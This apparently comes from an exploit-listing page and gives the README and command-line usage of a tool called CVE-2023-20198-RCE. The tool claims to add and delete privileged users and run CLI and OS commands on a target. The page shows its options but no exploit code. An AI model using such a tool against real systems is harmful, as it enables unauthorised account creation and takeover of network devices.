Share
## https://sploitus.com/exploit?id=70A262CE-4967-5480-9A9B-FA07CF9A9EA0
# CVE-2023-20198-RCE
CVE-2023-20198-RCE, support adding/deleting users and executing cli commands/system commands.
# Usage
CVE-2023-20198-RCE.py [-h] -u URL [-p PROXY] [-au ADD_USER] [-ap ADD_PASS] [-du DEL_USER] [-pm PRIVILEGE_MODE]
                             [-em EXPLOIT_MODE] [-oc OS_CMD] [-cc CLI_CMD]

CVE-2023-20198-RCE

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url to check, eg: http://example.com
  -p PROXY, --proxy PROXY
                        proxy url, eg: http://127.0.0.1:8083
  -au ADD_USER, --add-user ADD_USER
                        username to add.If left blank, an 8-digit mixed case English string will be randomly
                        generated.
  -ap ADD_PASS, --add-pass ADD_PASS
                        password to add.If left blank, an 8-digit mixed case English string will be randomly
                        generated.
  -du DEL_USER, --del-user DEL_USER
                        username to delete
  -pm PRIVILEGE_MODE, --privilege-mode PRIVILEGE_MODE
                        user/privileged
  -em EXPLOIT_MODE, --exploit-mode EXPLOIT_MODE
                        user/cmd
  -oc OS_CMD, --os-cmd OS_CMD
                        exec os command
  -cc CLI_CMD, --cli-cmd CLI_CMD
                        exec cli command